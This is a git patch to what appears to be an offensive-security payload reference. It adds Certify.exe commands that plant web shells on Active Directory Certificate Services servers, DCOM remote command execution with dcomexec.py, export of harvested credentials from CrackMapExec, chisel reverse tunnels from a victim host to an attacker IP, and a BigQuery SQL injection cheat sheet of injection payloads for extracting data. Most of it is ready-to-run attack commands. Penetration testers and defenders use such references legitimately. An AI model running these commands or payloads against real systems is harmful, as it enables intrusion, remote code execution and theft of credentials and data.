From 71dcfd5ca765fe7d1397c62a733066c63bceed19 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Fri, 18 Feb 2022 14:50:38 +0100 Subject: [PATCH] ADCS ESC7 Shell + Big Query SQL --- .../Active Directory Attack.md | 32 ++++++++- .../Miscellaneous - Tricks.md | 10 +++ .../Network Pivoting Techniques.md | 7 +- SQL Injection/BigQuery Injection.md | 70 +++++++++++++++++++ 4 files changed, 114 insertions(+), 5 deletions(-) create mode 100644 SQL Injection/BigQuery Injection.md diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index c0c16fe..60637d8 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -260,7 +260,12 @@ root@payload$ ./bloodhound --no-sandbox Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4J, pass:neo4j ``` -You can add some custom queries like [Bloodhound-Custom-Queries from @hausec](https://github.com/hausec/Bloodhound-Custom-Queries/blob/master/customqueries.json) and [BloodHoundQueries from CompassSecurity](https://github.com/CompassSecurity/BloodHoundQueries/blob/master/customqueries.json). Replace the customqueries.json file located at `/home/username/.config/bloodhound/customqueries.json` or `C:\Users\USERNAME\AppData\Roaming\BloodHound\customqueries.json`. +You can add some custom queries like : +* [Bloodhound-Custom-Queries from @hausec](https://github.com/hausec/Bloodhound-Custom-Queries/blob/master/customqueries.json) +* [BloodHoundQueries from CompassSecurity](https://github.com/CompassSecurity/BloodHoundQueries/blob/master/customqueries.json) +* [BloodHound Custom Queries from Exegol - @ShutdownRepo](https://raw.githubusercontent.com/ShutdownRepo/Exegol/master/sources/bloodhound/customqueries.json) + +Replace the customqueries.json file located at `/home/username/.config/bloodhound/customqueries.json` or `C:\Users\USERNAME\AppData\Roaming\BloodHound\customqueries.json`. ### Using PowerView @@ -2302,6 +2307,22 @@ Exploitation: Certify.exe setconfig /removeapproval /restart ``` +Alternative exploitation from **ManageCA** to **RCE** on ADCS server: + +```ps1 +# Get the current CDP list. Useful to find remote writable shares: +Certify.exe writefile /ca:SERVER\ca-name /readonly + +# Write an aspx shell to a local web directory: +Certify.exe writefile /ca:SERVER\ca-name /path:C:\Windows\SystemData\CES\CA-Name\shell.aspx /input:C:\Local\Path\shell.aspx + +# Write the default asp shell to a local web directory: +Certify.exe writefile /ca:SERVER\ca-name /path:c:\inetpub\wwwroot\shell.asp + +# Write a php shell to a remote web directory: +Certify.exe writefile /ca:SERVER\ca-name /path:\\remote.server\share\shell.php /input:C:\Local\path\shell.php +``` + #### ESC8 - AD CS Relay Attack @@ -2599,11 +2620,15 @@ bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F38 > DCOM is an extension of COM (Component Object Model), which allows applications to instantiate and access the properties and methods of COM objects on a remote computer. -* Impacket DcomExec.py +* Impacket DCOMExec.py ```ps1 dcomexec.py [-h] [-share SHARE] [-nooutput] [-ts] [-debug] [-codec CODEC] [-object [{ShellWindows,ShellBrowserWindow,MMC20}]] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] [-A authfile] [-keytab KEYTAB] target [command ...] dcomexec.py -share C$ -object MMC20 '/:@' dcomexec.py -share C$ -object MMC20 '/:@' 'ipconfig' + + python3 dcomexec.py -object MMC20 -silentcommand -debug $DOMAIN/$USER:$PASSWORD\$@$HOST 'notepad.exe' + # -object MMC20 specifies that we wish to instantiate the MMC20.Application object. + # -silentcommand executes the command without attempting to retrieve the output. ``` * CheeseTools - https://github.com/klezVirus/CheeseTools ```powershell @@ -3493,4 +3518,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae * [CVE-2021-42287/CVE-2021-42278 Weaponisation - @exploitph](https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html) * [ADCS: Playing with ESC4 - Matthew Creel](https://www.fortalicesolutions.com/posts/adcs-playing-with-esc4) * [The Kerberos Key List Attack: The return of the Read Only Domain Controllers - Leandro Cuozzo](https://www.secureauth.com/blog/the-kerberos-key-list-attack-the-return-of-the-read-only-domain-controllers/) -* [AD CS: weaponizing the ESC7 attack - Kurosh Dabbagh - 26 January, 2022](https://www.blackarrow.net/adcs-weaponizing-esc7-attack/) \ No newline at end of file +* [AD CS: weaponizing the ESC7 attack - Kurosh Dabbagh - 26 January, 2022](https://www.blackarrow.net/adcs-weaponizing-esc7-attack/) +* [AD CS: from ManageCA to RCE - 11 February, 2022 - Pablo Martínez, Kurosh Dabbagh](https://www.blackarrow.net/ad-cs-from-manageca-to-rce/) diff --git a/Methodology and Resources/Miscellaneous - Tricks.md b/Methodology and Resources/Miscellaneous - Tricks.md index 1794178..e82618b 100644 --- a/Methodology and Resources/Miscellaneous - Tricks.md +++ b/Methodology and Resources/Miscellaneous - Tricks.md @@ -14,4 +14,14 @@ $ wall "Stop messing with the XXX service !" $ wall -n "System will go down for 2 hours maintenance at 13:00 PM" # "-n" only for root $ who $ write root pts/2 # press Ctrl+D after typing the message. +``` + +## CrackMapExec Credential Database + +```ps1 +cmedb (default) > workspace create test +cmedb (test) > workspace default +cmedb (test) > proto smb +cmedb (test)(smb) > creds +cmedb (test)(smb) > export creds csv /tmp/creds ``` \ No newline at end of file diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md index 68a6197..39e40aa 100644 --- a/Methodology and Resources/Network Pivoting Techniques.md +++ b/Methodology and Resources/Network Pivoting Techniques.md @@ -8,7 +8,7 @@ * [Local Port Forwarding](#local-port-forwarding) * [Remote Port Forwarding](#remote-port-forwarding) * [Proxychains](#proxychains) -* [Graphtcp](#graphtcp) +* [Graftcp](#graftcp) * [Web SOCKS - reGeorg](#web-socks---regeorg) * [Web SOCKS - pivotnacci](#web-socks---pivotnacci) * [Metasploit](#metasploit) @@ -232,8 +232,11 @@ $ sshuttle -vvr root@10.10.10.10 10.1.1.0/24 -e "ssh -i ~/.ssh/id_rsa" go get -v github.com/jpillora/chisel # forward port 389 and 88 to hacker computer -user@victim$ .\chisel.exe client YOUR_IP:8008 R:88:127.0.0.1:88 R:389:localhost:389 user@hacker$ /opt/chisel/chisel server -p 8008 --reverse +user@victim$ .\chisel.exe client YOUR_IP:8008 R:88:127.0.0.1:88 R:389:localhost:389 + +# SOCKS +user@victim$ .\chisel.exe client YOUR_IP:8008 R:socks ``` ### SharpChisel diff --git a/SQL Injection/BigQuery Injection.md b/SQL Injection/BigQuery Injection.md new file mode 100644 index 0000000..ed84975 --- /dev/null +++ b/SQL Injection/BigQuery Injection.md @@ -0,0 +1,70 @@ +# Google BigQuery SQL Injection + +## Summary + +* [Detection](#detection) +* [BigQuery Comment](#bigquery-comment) +* [BigQuery Union Based](#bigquery-union-based) +* [BigQuery Error Based](#bigquery-error-based) +* [BigQuery Boolean Based](#bigquery-boolean-based) +* [BigQuery Time Based](#bigquery-time-based) +* [References](#references) + +## Detection + +* Use a classic single quote to trigger an error: `'` +* Identify BigQuery using backtick notation: ```SELECT .... FROM `` AS ...``` + +```ps1 +# Gathering project id +select @@project_id + +# Gathering all dataset names +select schema_name from INFORMATION_SCHEMA.SCHEMATA + +# Gathering data from specific project id & dataset +select * from `project_id.dataset_name.table_name` +``` + +## BigQuery Comment + +```ps1 +select 1#from here it is not working +select 1/*between those it is not working*/ +``` + +## BigQuery Union Based + +```ps1 +UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name# +true) GROUP BY column_name LIMIT 1 UNION ALL SELECT (SELECT 'asd'),1,1,1,1,1,1)) AS T1 GROUP BY column_name# +true) GROUP BY column_name LIMIT 1 UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name# +' GROUP BY column_name UNION ALL SELECT column_name,1,1 FROM (select column_name AS new_name from `project_id.dataset_name.table_name`) AS A GROUP BY column_name# +``` + +## BigQuery Error Based + +```ps1 +# Error based - division by zero +' OR if(1/(length((select('a')))-1)=1,true,false) OR ' + +# Error based - casting: select CAST(@@project_id AS INT64) +dataset_name.column_name` union all select CAST(@@project_id AS INT64) ORDER BY 1 DESC# +``` + +## BigQuery Boolean Based + +```ps1 +' WHERE SUBSTRING((select column_name from `project_id.dataset_name.table_name` limit 1),1,1)='A'# +``` + +## BigQuery Time Based + +* Time based functions does not exist in the BigQuery syntax. + +## References + +* [BigQuery SQL Injection Cheat Sheet - Ozgur Alp - Feb 14](https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac) +* [BigQuery Documentation - Query Syntax](https://cloud.google.com/bigquery/docs/reference/standard-sql/query-syntax) +* [BigQuery Documentation - Functions and Operators](https://cloud.google.com/bigquery/docs/reference/standard-sql/functions-and-operators) +* [Akamai Web Application Firewall Bypass Journey: Exploiting “Google BigQuery” SQL Injection Vulnerability - By Duc Nguyen The, March 31, 2020](https://hackemall.live/index.php/2020/03/31/akamai-web-application-firewall-bypass-journey-exploiting-google-bigquery-sql-injection-vulnerability/) \ No newline at end of file